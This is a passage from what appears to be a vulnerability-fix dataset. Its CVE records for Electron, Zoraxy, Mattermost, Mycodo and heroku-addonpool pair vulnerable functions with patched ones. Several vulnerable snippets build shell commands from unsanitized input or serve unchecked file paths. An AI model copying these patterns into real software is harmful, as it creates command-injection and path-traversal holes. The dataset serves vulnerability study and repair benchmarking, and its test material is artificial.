require('./web-view/web-view-attributes')\n }\n}\n\nif (nodeIntegration === 'true') {\n // Export node bindings to global.\n global.require = require\n global.module = module\n\n // Set the __filename to the path of html file if it is file: protocol.\n if (window.location.protocol === 'file:') {\n var pathname = process.platform === 'win32' && window.location.pathname[0] === '/' ? 
window.location.pathname.substr(1) : window.location.pathname\n global.__filename = path.normalize(decodeURIComponent(pathname))\n global.__dirname = path.dirname(global.__filename)\n\n // Set module's filename so relative require can work as expected.\n module.filename = global.__filename\n\n // Also search for module under the html file.\n module.paths = module.paths.concat(Module._nodeModulePaths(global.__dirname))\n } else {\n global.__filename = __filename\n global.__dirname = __dirname\n\n if (appPath) {\n // Search for module under the app directory\n module.paths = module.paths.concat(Module._nodeModulePaths(appPath))\n }\n }\n\n // Redirect window.onerror to uncaughtException.\n window.onerror = function (message, filename, lineno, colno, error) {\n if (global.process.listeners('uncaughtException').length > 0) {\n global.process.emit('uncaughtException', error)\n return true\n } else {\n return false\n }\n }\n} else {\n // Delete Node's symbols after the Environment has been loaded.\n process.once('loaded', function () {\n delete global.process\n delete global.Buffer\n delete global.setImmediate\n delete global.clearImmediate\n delete global.global\n })\n}\n\n// Load the script specfied by the \"preload\" attribute.\nif (preloadScript) {\n try {\n require(preloadScript)\n } catch (error) {\n console.error('Unable to load preload script: ' + preloadScript)\n console.error(error.stack || error.message)\n }\n}"}], "fix_func": [{"id": "fix_js_81_1", "commit": "05b6d91", "file_path": "lib/renderer/init.js", "start_line": "1", "end_line": "157", "snippet": "'use strict'\n\nconst events = require('events')\nconst path = require('path')\nconst Module = require('module')\nconst resolvePromise = Promise.resolve.bind(Promise)\n\n// We modified the original process.argv to let node.js load the\n// init.js, we need to restore it here.\nprocess.argv.splice(1, 1)\n\n// Clear search paths.\nrequire('../common/reset-search-paths')\n\n// Import common settings.\nrequire('../common/init')\n\nvar globalPaths = Module.globalPaths\n\n// Expose public APIs.\nglobalPaths.push(path.join(__dirname, 'api', 'exports'))\n\n// The global variable will be used by ipc for event dispatching\nvar v8Util = process.atomBinding('v8_util')\n\nv8Util.setHiddenValue(global, 'ipc', new events.EventEmitter())\n\n// Use electron module after everything is ready.\nconst electron = require('electron')\n\n// Call webFrame method.\nelectron.ipcRenderer.on('ELECTRON_INTERNAL_RENDERER_WEB_FRAME_METHOD', (event, method, args) => {\n electron.webFrame[method](...args)\n})\n\nelectron.ipcRenderer.on('ELECTRON_INTERNAL_RENDERER_SYNC_WEB_FRAME_METHOD', (event, requestId, method, args) => {\n const result = electron.webFrame[method](...args)\n event.sender.send(`ELECTRON_INTERNAL_BROWSER_SYNC_WEB_FRAME_RESPONSE_${requestId}`, result)\n})\n\nelectron.ipcRenderer.on('ELECTRON_INTERNAL_RENDERER_ASYNC_WEB_FRAME_METHOD', (event, requestId, method, args) => {\n const responseCallback = function (result) {\n resolvePromise(result)\n .then((resolvedResult) => {\n event.sender.send(`ELECTRON_INTERNAL_BROWSER_ASYNC_WEB_FRAME_RESPONSE_${requestId}`, null, resolvedResult)\n })\n .catch((resolvedError) => {\n event.sender.send(`ELECTRON_INTERNAL_BROWSER_ASYNC_WEB_FRAME_RESPONSE_${requestId}`, resolvedError)\n })\n }\n args.push(responseCallback)\n electron.webFrame[method](...args)\n})\n\n// Process command line arguments.\nlet nodeIntegration = 'false'\nlet preloadScript = null\nlet isBackgroundPage = false\nlet appPath = null\nfor (let arg of 
process.argv) {\n if (arg.indexOf('--guest-instance-id=') === 0) {\n // This is a guest web view.\n process.guestInstanceId = parseInt(arg.substr(arg.indexOf('=') + 1))\n } else if (arg.indexOf('--opener-id=') === 0) {\n // This is a guest BrowserWindow.\n process.openerId = parseInt(arg.substr(arg.indexOf('=') + 1))\n } else if (arg.indexOf('--node-integration=') === 0) {\n nodeIntegration = arg.substr(arg.indexOf('=') + 1)\n } else if (arg.indexOf('--preload=') === 0) {\n preloadScript = arg.substr(arg.indexOf('=') + 1)\n } else if (arg === '--background-page') {\n isBackgroundPage = true\n } else if (arg.indexOf('--app-path=') === 0) {\n appPath = arg.substr(arg.indexOf('=') + 1)\n }\n}\n\nif (window.location.protocol === 'chrome-devtools:') {\n // Override some inspector APIs.\n require('./inspector')\n nodeIntegration = 'false'\n} else if (window.location.protocol === 'chrome-extension:') {\n // Add implementations of chrome API.\n require('./chrome-api').injectTo(window.location.hostname, isBackgroundPage, window)\n nodeIntegration = 'false'\n} else if (window.location.protocol === 'chrome:') {\n // Disable node integration for chrome UI scheme.\n nodeIntegration = 'false'\n} else {\n // Override default web functions.\n require('./override')\n\n // Inject content scripts.\n require('./content-scripts-injector')\n\n // Load webview tag implementation.\n if (nodeIntegration === 'true' && process.guestInstanceId == null) {\n require('./web-view/web-view')\n require('./web-view/web-view-attributes')\n }\n}\n\nif (nodeIntegration === 'true') {\n // Export node bindings to global.\n global.require = require\n global.module = module\n\n // Set the __filename to the path of html file if it is file: protocol.\n if (window.location.protocol === 'file:') {\n var pathname = process.platform === 'win32' && window.location.pathname[0] === '/' ? 
window.location.pathname.substr(1) : window.location.pathname\n global.__filename = path.normalize(decodeURIComponent(pathname))\n global.__dirname = path.dirname(global.__filename)\n\n // Set module's filename so relative require can work as expected.\n module.filename = global.__filename\n\n // Also search for module under the html file.\n module.paths = module.paths.concat(Module._nodeModulePaths(global.__dirname))\n } else {\n global.__filename = __filename\n global.__dirname = __dirname\n\n if (appPath) {\n // Search for module under the app directory\n module.paths = module.paths.concat(Module._nodeModulePaths(appPath))\n }\n }\n\n // Redirect window.onerror to uncaughtException.\n window.onerror = function (message, filename, lineno, colno, error) {\n if (global.process.listeners('uncaughtException').length > 0) {\n global.process.emit('uncaughtException', error)\n return true\n } else {\n return false\n }\n }\n} else {\n // Delete Node's symbols after the Environment has been loaded.\n process.once('loaded', function () {\n delete global.process\n delete global.Buffer\n delete global.setImmediate\n delete global.clearImmediate\n delete global.global\n })\n}\n\n// Load the script specfied by the \"preload\" attribute.\nif (preloadScript) {\n try {\n require(preloadScript)\n } catch (error) {\n console.error('Unable to load preload script: ' + preloadScript)\n console.error(error.stack || error.message)\n }\n}"}], "vul_patch": "--- a/lib/renderer/init.js\n+++ b/lib/renderer/init.js\n@@ -78,7 +78,7 @@\n if (window.location.protocol === 'chrome-devtools:') {\n // Override some inspector APIs.\n require('./inspector')\n- nodeIntegration = 'true'\n+ nodeIntegration = 'false'\n } else if (window.location.protocol === 'chrome-extension:') {\n // Add implementations of chrome API.\n require('./chrome-api').injectTo(window.location.hostname, isBackgroundPage, window)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-52010", "cve_description": "Zoraxy is a general purpose HTTP reverse proxy and forwarding tool. A command injection vulnerability in the Web SSH feature allows an authenticated attacker to execute arbitrary commands as root on the host. Zoraxy has a Web SSH terminal feature that allows authenticated users to connect to SSH servers from their browsers. In HandleCreateProxySession the request to create an SSH session is handled. An attacker can exploit the username variable to escape from the bash command and inject arbitrary commands into sshCommand. 
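
# Note on the Electron lib/renderer/init.js record above: the entire fix is one default
# flipped from 'true' to 'false' for the chrome-devtools: scheme, i.e. privileged Node
# bindings become opt-in per URL scheme instead of being re-enabled for devtools pages.
# A minimal Python sketch of that fail-closed dispatch follows; it is an illustration of
# the pattern, not Electron's actual logic, and the scheme table is assumed for the example.

def node_integration_for(protocol: str, requested: bool) -> bool:
    # Schemes that must never receive Node bindings, regardless of what was requested.
    forced_off = {"chrome-devtools:", "chrome-extension:", "chrome:"}
    if protocol in forced_off:
        return False      # the vulnerable version returned True for chrome-devtools:
    return requested      # ordinary pages keep whatever the embedder configured

if __name__ == "__main__":
    assert node_integration_for("chrome-devtools:", True) is False
    assert node_integration_for("https:", False) is False
    assert node_integration_for("file:", True) is True
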
This is possible, because, unlike hostname and port, the username is not validated or sanitized.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/tobychui/zoraxy", "patch_url": ["https://github.com/tobychui/zoraxy/commit/2e9bc77a5d832bff1093058d42ce7a61382e4bc6", "https://github.com/tobychui/zoraxy/commit/c07d5f85dfc37bd32819358ed7d4bc32c604e8f0"], "programing_language": "Go", "vul_func": [{"id": "vul_go_32_1", "commit": "e79a70b", "file_path": "src/mod/sshprox/sshprox.go", "start_line": 165, "end_line": 203, "snippet": "func (i *Instance) CreateNewConnection(listenPort int, username string, remoteIpAddr string, remotePort int) error {\n\t//Create a gotty instance\n\tconnAddr := remoteIpAddr\n\tif username != \"\" {\n\t\tconnAddr = username + \"@\" + remoteIpAddr\n\t}\n\tconfigPath := filepath.Join(filepath.Dir(i.ExecPath), \".gotty\")\n\ttitle := username + \"@\" + remoteIpAddr\n\tif remotePort != 22 {\n\t\ttitle = title + \":\" + strconv.Itoa(remotePort)\n\t}\n\n\tsshCommand := []string{\"ssh\", \"-t\", connAddr, \"-p\", strconv.Itoa(remotePort)}\n\tcmd := exec.Command(i.ExecPath, \"-w\", \"-p\", strconv.Itoa(listenPort), \"--once\", \"--config\", configPath, \"--title-format\", title, \"bash\", \"-c\", strings.Join(sshCommand, \" \"))\n\tcmd.Dir = filepath.Dir(i.ExecPath)\n\tcmd.Env = append(os.Environ(), \"TERM=xterm\")\n\tcmd.Stdout = os.Stdout\n\tcmd.Stderr = os.Stderr\n\tgo func() {\n\t\tcmd.Run()\n\t\ti.Destroy()\n\t}()\n\ti.tty = cmd\n\ti.AssignedPort = listenPort\n\ti.RemoteAddr = remoteIpAddr\n\ti.RemotePort = remotePort\n\n\t//Create a new proxy agent for this root\n\tpath, err := url.Parse(\"http://127.0.0.1:\" + strconv.Itoa(listenPort))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t//Create new proxy objects to the proxy\n\tproxy := reverseproxy.NewReverseProxy(path)\n\n\ti.conn = proxy\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_32_1", "commit": "2e9bc77", "file_path": "src/mod/sshprox/sshprox.go", "start_line": 150, "end_line": 199, "snippet": "func (i *Instance) CreateNewConnection(listenPort int, username string, remoteIpAddr string, remotePort int) error {\n\t//Create a gotty instance\n\tconnAddr := remoteIpAddr\n\tif username != \"\" {\n\t\tconnAddr = username + \"@\" + remoteIpAddr\n\t}\n\n\t//Trim the space in the username and remote address\n\tusername = strings.TrimSpace(username)\n\tremoteIpAddr = 
strings.TrimSpace(remoteIpAddr)\n\n\t//Validate the username and remote address\n\terr := ValidateUsernameAndRemoteAddr(username, remoteIpAddr)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tconfigPath := filepath.Join(filepath.Dir(i.ExecPath), \".gotty\")\n\ttitle := username + \"@\" + remoteIpAddr\n\tif remotePort != 22 {\n\t\ttitle = title + \":\" + strconv.Itoa(remotePort)\n\t}\n\n\tsshCommand := []string{\"ssh\", \"-t\", connAddr, \"-p\", strconv.Itoa(remotePort)}\n\tcmd := exec.Command(i.ExecPath, \"-w\", \"-p\", strconv.Itoa(listenPort), \"--once\", \"--config\", configPath, \"--title-format\", title, \"bash\", \"-c\", strings.Join(sshCommand, \" \"))\n\tcmd.Dir = filepath.Dir(i.ExecPath)\n\tcmd.Env = append(os.Environ(), \"TERM=xterm\")\n\tcmd.Stdout = os.Stdout\n\tcmd.Stderr = os.Stderr\n\tgo func() {\n\t\tcmd.Run()\n\t\ti.Destroy()\n\t}()\n\ti.tty = cmd\n\ti.AssignedPort = listenPort\n\ti.RemoteAddr = remoteIpAddr\n\ti.RemotePort = remotePort\n\n\t//Create a new proxy agent for this root\n\tpath, err := url.Parse(\"http://127.0.0.1:\" + strconv.Itoa(listenPort))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t//Create new proxy objects to the proxy\n\tproxy := reverseproxy.NewReverseProxy(path)\n\n\ti.conn = proxy\n\treturn nil\n}"}, {"id": "fix_go_32_2", "commit": "2e9bc77", "file_path": "src/mod/sshprox/utils.go", "start_line": 81, "end_line": 101, "snippet": "func ValidateUsernameAndRemoteAddr(username string, remoteIpAddr string) error {\n\t// Validate and sanitize the username to prevent ssh injection\n\tvalidUsername := regexp.MustCompile(`^[a-zA-Z0-9._-]+$`)\n\tif !validUsername.MatchString(username) {\n\t\treturn errors.New(\"invalid username, only alphanumeric characters, dots, underscores and dashes are allowed\")\n\t}\n\n\t//Check if the remoteIpAddr is a valid ipv4 or ipv6 address\n\tif net.ParseIP(remoteIpAddr) != nil {\n\t\t//A valid IP address do not need further validation\n\t\treturn nil\n\t}\n\n\t// Validate and sanitize the remote domain to prevent injection\n\tvalidRemoteAddr := regexp.MustCompile(`^[a-zA-Z0-9._-]+$`)\n\tif !validRemoteAddr.MatchString(remoteIpAddr) {\n\t\treturn errors.New(\"invalid remote address, only alphanumeric characters, dots, underscores and dashes are allowed\")\n\t}\n\n\treturn nil\n}"}, {"id": "fix_go_32_3", "commit": "2e9bc77", "file_path": "src/webssh.go", "start_line": 19, "end_line": 75, "snippet": "func HandleCreateProxySession(w http.ResponseWriter, r *http.Request) {\n\t//Get what ip address and port to connect to\n\tipaddr, err := utils.PostPara(r, \"ipaddr\")\n\tif err != nil {\n\t\thttp.Error(w, \"Invalid Usage\", http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tportString, err := utils.PostPara(r, \"port\")\n\tif err != nil {\n\t\tportString = \"22\"\n\t}\n\n\tusername, err := utils.PostPara(r, \"username\")\n\tif err != nil {\n\t\tusername = \"\"\n\t}\n\n\tport, err := strconv.Atoi(portString)\n\tif err != nil {\n\t\tutils.SendErrorResponse(w, \"invalid port number given\")\n\t\treturn\n\t}\n\n\tif !*allowSshLoopback {\n\t\t//Not allow loopback connections\n\t\tif sshprox.IsLoopbackIPOrDomain(ipaddr) {\n\t\t\t//Request target is loopback\n\t\t\tutils.SendErrorResponse(w, \"loopback web ssh connection is not enabled on this host\")\n\t\t\treturn\n\t\t}\n\t}\n\n\t//Check if the target is a valid ssh endpoint\n\tif !sshprox.IsSSHConnectable(ipaddr, port) {\n\t\tutils.SendErrorResponse(w, ipaddr+\":\"+strconv.Itoa(port)+\" is not a valid SSH server\")\n\t\treturn\n\t}\n\n\t//Create a new proxy instance\n\tinstance, err := 
webSshManager.NewSSHProxy(\"./tmp/gotty\")\n\tif err != nil {\n\t\tutils.SendErrorResponse(w, strings.ReplaceAll(err.Error(), \"\\\\\", \"/\"))\n\t\treturn\n\t}\n\n\t//Create an ssh process to the target address\n\terr = instance.CreateNewConnection(webSshManager.GetNextPort(), username, ipaddr, port)\n\tif err != nil {\n\t\tutils.SendErrorResponse(w, err.Error())\n\t\treturn\n\t}\n\n\t//Return the instance uuid\n\tjs, _ := json.Marshal(instance.UUID)\n\tutils.SendJSONResponse(w, string(js))\n}"}], "vul_patch": "--- a/src/mod/sshprox/sshprox.go\n+++ b/src/mod/sshprox/sshprox.go\n@@ -4,6 +4,17 @@\n \tif username != \"\" {\n \t\tconnAddr = username + \"@\" + remoteIpAddr\n \t}\n+\n+\t//Trim the space in the username and remote address\n+\tusername = strings.TrimSpace(username)\n+\tremoteIpAddr = strings.TrimSpace(remoteIpAddr)\n+\n+\t//Validate the username and remote address\n+\terr := ValidateUsernameAndRemoteAddr(username, remoteIpAddr)\n+\tif err != nil {\n+\t\treturn err\n+\t}\n+\n \tconfigPath := filepath.Join(filepath.Dir(i.ExecPath), \".gotty\")\n \ttitle := username + \"@\" + remoteIpAddr\n \tif remotePort != 22 {\n\n--- /dev/null\n+++ b/src/mod/sshprox/utils.go\n@@ -0,0 +1,21 @@\n+func ValidateUsernameAndRemoteAddr(username string, remoteIpAddr string) error {\n+\t// Validate and sanitize the username to prevent ssh injection\n+\tvalidUsername := regexp.MustCompile(`^[a-zA-Z0-9._-]+$`)\n+\tif !validUsername.MatchString(username) {\n+\t\treturn errors.New(\"invalid username, only alphanumeric characters, dots, underscores and dashes are allowed\")\n+\t}\n+\n+\t//Check if the remoteIpAddr is a valid ipv4 or ipv6 address\n+\tif net.ParseIP(remoteIpAddr) != nil {\n+\t\t//A valid IP address do not need further validation\n+\t\treturn nil\n+\t}\n+\n+\t// Validate and sanitize the remote domain to prevent injection\n+\tvalidRemoteAddr := regexp.MustCompile(`^[a-zA-Z0-9._-]+$`)\n+\tif !validRemoteAddr.MatchString(remoteIpAddr) {\n+\t\treturn errors.New(\"invalid remote address, only alphanumeric characters, dots, underscores and dashes are allowed\")\n+\t}\n+\n+\treturn nil\n+}\n\n--- /dev/null\n+++ b/src/webssh.go\n@@ -0,0 +1,57 @@\n+func HandleCreateProxySession(w http.ResponseWriter, r *http.Request) {\n+\t//Get what ip address and port to connect to\n+\tipaddr, err := utils.PostPara(r, \"ipaddr\")\n+\tif err != nil {\n+\t\thttp.Error(w, \"Invalid Usage\", http.StatusInternalServerError)\n+\t\treturn\n+\t}\n+\n+\tportString, err := utils.PostPara(r, \"port\")\n+\tif err != nil {\n+\t\tportString = \"22\"\n+\t}\n+\n+\tusername, err := utils.PostPara(r, \"username\")\n+\tif err != nil {\n+\t\tusername = \"\"\n+\t}\n+\n+\tport, err := strconv.Atoi(portString)\n+\tif err != nil {\n+\t\tutils.SendErrorResponse(w, \"invalid port number given\")\n+\t\treturn\n+\t}\n+\n+\tif !*allowSshLoopback {\n+\t\t//Not allow loopback connections\n+\t\tif sshprox.IsLoopbackIPOrDomain(ipaddr) {\n+\t\t\t//Request target is loopback\n+\t\t\tutils.SendErrorResponse(w, \"loopback web ssh connection is not enabled on this host\")\n+\t\t\treturn\n+\t\t}\n+\t}\n+\n+\t//Check if the target is a valid ssh endpoint\n+\tif !sshprox.IsSSHConnectable(ipaddr, port) {\n+\t\tutils.SendErrorResponse(w, ipaddr+\":\"+strconv.Itoa(port)+\" is not a valid SSH server\")\n+\t\treturn\n+\t}\n+\n+\t//Create a new proxy instance\n+\tinstance, err := webSshManager.NewSSHProxy(\"./tmp/gotty\")\n+\tif err != nil {\n+\t\tutils.SendErrorResponse(w, strings.ReplaceAll(err.Error(), \"\\\\\",
\"/\"))\n+\t\treturn\n+\t}\n+\n+\t//Create an ssh process to the target address\n+\terr = instance.CreateNewConnection(webSshManager.GetNextPort(), username, ipaddr, port)\n+\tif err != nil {\n+\t\tutils.SendErrorResponse(w, err.Error())\n+\t\treturn\n+\t}\n+\n+\t//Return the instance uuid\n+\tjs, _ := json.Marshal(instance.UUID)\n+\tutils.SendJSONResponse(w, string(js))\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-52010:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/zoraxy\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd ./src/mod/sshprox && go test -timeout 30s -run ^TestCreateNewConnection$ imuslab.com/zoraxy/mod/sshprox\n", "unit_test_cmd": null} {"cve_id": "CVE-2023-4106", "cve_description": "Mattermost fails to check if the requesting user is a guest before performing different actions to public playbooks, resulting a guest being able to\u00a0view, join, edit, export and archive public playbooks.\n\n", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}}, "repo": "https://github.com/mattermost/mattermost", "patch_url": ["https://github.com/mattermost/mattermost/commit/93511636ba2cbb38efd000af019fb89cd993b2f3", "https://github.com/mattermost/mattermost/commit/16af122696be49f1756a390446e6825976d438a8", "https://github.com/mattermost/mattermost/commit/9560a4a5596d400495feaa5911ef0116b0267e49"], "programing_language": "Go", "vul_func": [{"id": "vul_go_123_1", "commit": "9c1ca9e", "file_path": "app/platform/service.go", "start_line": 372, "end_line": 374, "snippet": "func (ps *PlatformService) SetTelemetryId(id string) {\n\tps.telemetryId = id\n}"}], "fix_func": [{"id": "fix_go_123_1", "commit": "9351163", "file_path": "app/platform/service.go", "start_line": 372, "end_line": 381, "snippet": "func (ps *PlatformService) SetTelemetryId(id string) {\n\tps.telemetryId = id\n\n\tps.PostTelemetryIdHook()\n}\n\n// PostTelemetryIdHook triggers necessary events to propagate telemtery ID\nfunc (ps *PlatformService) PostTelemetryIdHook() {\n\tps.regenerateClientConfig()\n}"}], "vul_patch": "--- a/app/platform/service.go\n+++ b/app/platform/service.go\n@@ -1,3 +1,10 @@\n func (ps *PlatformService) SetTelemetryId(id string) {\n \tps.telemetryId = id\n+\n+\tps.PostTelemetryIdHook()\n }\n+\n+// PostTelemetryIdHook triggers necessary events to propagate telemtery ID\n+func (ps *PlatformService) PostTelemetryIdHook() {\n+\tps.regenerateClientConfig()\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-41185", "cve_description": "Mycodo is an environmental monitoring and regulation system. An exploit in versions prior to 8.12.7 allows anyone with access to endpoints to download files outside the intended directory. A patch has been applied and a release made. Users should upgrade to version 8.12.7. 
As a workaround, users may manually apply the changes from the fix commit.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/kizniche/Mycodo", "patch_url": ["https://github.com/kizniche/Mycodo/commit/23ac5dd422029c2b6ae1701a3599b6d41b66a6a9"], "programing_language": "Python", "vul_func": [{"id": "vul_py_390_1", "commit": "69acf2646f5e50435e086bd544a9d264adc00edf", "file_path": "mycodo/mycodo_flask/routes_general.py", "start_line": 115, "end_line": 122, "snippet": "def send_note_attachment(filename):\n \"\"\"Return a file from the note attachment directory\"\"\"\n file_path = os.path.join(PATH_NOTE_ATTACHMENTS, filename)\n if file_path is not None:\n try:\n return send_file(file_path, as_attachment=True)\n except Exception:\n logger.exception(\"Send note attachment\")"}, {"id": "vul_py_390_2", "commit": "69acf2646f5e50435e086bd544a9d264adc00edf", "file_path": "mycodo/mycodo_flask/routes_general.py", "start_line": 127, "end_line": 154, "snippet": "def camera_img_return_path(camera_unique_id, img_type, filename):\n \"\"\"Return an image from stills or time-lapses\"\"\"\n camera = Camera.query.filter(Camera.unique_id == camera_unique_id).first()\n camera_path = assure_path_exists(\n os.path.join(PATH_CAMERAS, '{uid}'.format(uid=camera.unique_id)))\n if img_type == 'still':\n if camera.path_still:\n path = camera.path_still\n else:\n path = os.path.join(camera_path, img_type)\n elif img_type == 'timelapse':\n if camera.path_timelapse:\n path = camera.path_timelapse\n else:\n path = os.path.join(camera_path, img_type)\n else:\n return \"Unknown Image Type\"\n\n if os.path.isdir(path):\n files = (files for files in os.listdir(path)\n if os.path.isfile(os.path.join(path, files)))\n else:\n files = []\n if filename in files:\n path_file = os.path.join(path, filename)\n return send_file(path_file, mimetype='image/jpeg')\n\n return \"Image not found\""}], "fix_func": [{"id": "fix_py_390_1", "commit": "23ac5dd422029c2b6ae1701a3599b6d41b66a6a9", "file_path": "mycodo/mycodo_flask/routes_general.py", "start_line": 115, "end_line": 123, "snippet": "def send_note_attachment(filename):\n \"\"\"Return a file from the note attachment directory\"\"\"\n file_path = os.path.join(PATH_NOTE_ATTACHMENTS, filename)\n if file_path is not None:\n try:\n if os.path.abspath(file_path).startswith(PATH_NOTE_ATTACHMENTS):\n return send_file(file_path, as_attachment=True)\n except Exception:\n logger.exception(\"Send note attachment\")"}, {"id": "fix_py_390_2", "commit": "23ac5dd422029c2b6ae1701a3599b6d41b66a6a9", "file_path": "mycodo/mycodo_flask/routes_general.py", "start_line": 128, "end_line": 156, "snippet": "def camera_img_return_path(camera_unique_id, img_type, filename):\n \"\"\"Return an image from stills or time-lapses\"\"\"\n camera = Camera.query.filter(Camera.unique_id == camera_unique_id).first()\n camera_path = assure_path_exists(\n os.path.join(PATH_CAMERAS, '{uid}'.format(uid=camera.unique_id)))\n if img_type == 'still':\n if camera.path_still:\n path = camera.path_still\n else:\n path = os.path.join(camera_path, img_type)\n elif img_type == 'timelapse':\n if 
camera.path_timelapse:\n path = camera.path_timelapse\n else:\n path = os.path.join(camera_path, img_type)\n else:\n return \"Unknown Image Type\"\n\n if os.path.isdir(path):\n files = (files for files in os.listdir(path)\n if os.path.isfile(os.path.join(path, files)))\n else:\n files = []\n if filename in files:\n path_file = os.path.join(path, filename)\n if os.path.abspath(path_file).startswith(path):\n return send_file(path_file, mimetype='image/jpeg')\n\n return \"Image not found\""}], "vul_patch": "--- a/mycodo/mycodo_flask/routes_general.py\n+++ b/mycodo/mycodo_flask/routes_general.py\n@@ -3,6 +3,7 @@\n file_path = os.path.join(PATH_NOTE_ATTACHMENTS, filename)\n if file_path is not None:\n try:\n- return send_file(file_path, as_attachment=True)\n+ if os.path.abspath(file_path).startswith(PATH_NOTE_ATTACHMENTS):\n+ return send_file(file_path, as_attachment=True)\n except Exception:\n logger.exception(\"Send note attachment\")\n\n--- a/mycodo/mycodo_flask/routes_general.py\n+++ b/mycodo/mycodo_flask/routes_general.py\n@@ -23,6 +23,7 @@\n files = []\n if filename in files:\n path_file = os.path.join(path, filename)\n- return send_file(path_file, mimetype='image/jpeg')\n+ if os.path.abspath(path_file).startswith(path):\n+ return send_file(path_file, mimetype='image/jpeg')\n \n return \"Image not found\"\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-7634", "cve_description": "heroku-addonpool through 0.1.15 is vulnerable to Command Injection.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/nodef/heroku-addonpool", "patch_url": ["https://github.com/nodef/heroku-addonpool/commit/b1a5b316473ac92d783f3d54ee048d54082da38d"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_296_1", "commit": "7bd83e1650d8d6e6b8b436c5367c8cd27c4fcb3c", "file_path": "index.js", "start_line": 5, "end_line": 117, "snippet": "module.exports = function HerokuAddonPool(id, app, opt) {\n const unused = [];\n const supply = new Map();\n const removed = new Map();\n const pending = new Map();\n opt = opt||{};\n opt.config = opt.config||/\\S*/g;\n opt.log = opt.log||false;\n\n const log = function(msg) {\n if(opt.log) console.log(`${id}.${msg}`);\n };\n\n const supplySetOne = function(cfg) {\n return new Promise((fres, frej) => {\n const w = cfg.split('=');\n if(w[0].search(opt.config)<0) return;\n const key = w[0].substring(0, w[0].length-4);\n const val = 
{'value': w[1].substring(1, w[1].length-1)};\n cp.exec(`~/heroku addons:info ${key} --app ${app}`, (err, stdout) => {\n if(err) return frej(err);\n for(var r of stdout.toString().match(/[^\\r\\n]+/g)) {\n var k = _camel(r.startsWith('=')? 'name' : r.split(':')[0]);\n val[k] = r.substring(r.match(/[\\S\\s]+(=|:)\\s+/g)[0].length);\n }\n supply.set(key, val);\n fres(key);\n });\n });\n };\n\n const supplySet = function() {\n return new Promise((fres, frej) => {\n cp.exec(`~/heroku config -s --app ${app}`, (err, stdout) => {\n if(err) return frej(err);\n var pro = Promise.resolve();\n for(var cfg of stdout.toString().match(/[^\\r\\n]+/g)||[])\n ((val) => pro = pro.then(() => supplySetOne(val)))(cfg);\n pro.then(() => fres(supply));\n });\n });\n };\n\n const setup = function() {\n log(`setup()`);\n return supplySet().then((ans) => {\n for(var key of supply.keys()) {\n log(`setup:addUnused(${key})`);\n unused.push(key);\n }\n return ans;\n });\n };\n\n const remove = function(ref) {\n return new Promise((fres) => {\n if(unused.length===0) {\n log(`remove:addPending(${ref})`);\n return pending.set(ref, fres);\n }\n const key = unused.shift();\n removed.set(ref, key);\n log(`remove:getUnused(${ref}, ${key})`);\n fres(supply.get(key));\n });\n };\n\n const supplyReset = function(key) {\n log(`supplyReset(${key})`);\n const plan = supply.get(key).plan;\n return new Promise((fres, frej) => cp.exec(\n `~/heroku addons:destroy ${key} -a ${app} --confirm ${app} >/dev/null && `+\n `~/heroku addons:create ${plan} --as ${key} -a ${app} >/dev/null && `+\n `~/heroku config -s -a ${app} | grep ^${key}`,\n (err, stdout) => {\n const r = stdout.toString();\n fres(supply.get(key).value = r.substring(r.indexOf('=')+2, r.length-2));\n }\n ));\n };\n\n const pendingRemove = function() {\n if(!unused.length || !pending.size) return;\n const ref = pending.keys().next().value;\n const fres = pending.get(ref);\n pending.delete(ref);\n const key = unused.shift();\n removed.set(ref, key);\n log(`pendingRemove:getUnused(${ref}, ${key})`);\n fres(supply.get(key));\n return ref;\n };\n\n const add = function(ref) {\n if(pending.has(ref)) {\n log(`add:removePending(${ref})`);\n pending.delete(ref);\n }\n if(removed.has(ref)) {\n const key = removed.get(ref);\n removed.delete(ref);\n log(`add:addUnused(${ref}, ${key})`);\n return supplyReset(key).then(() => {\n unused.push(key);\n pendingRemove();\n return ref;\n });\n }\n return Promise.resolve(ref);\n 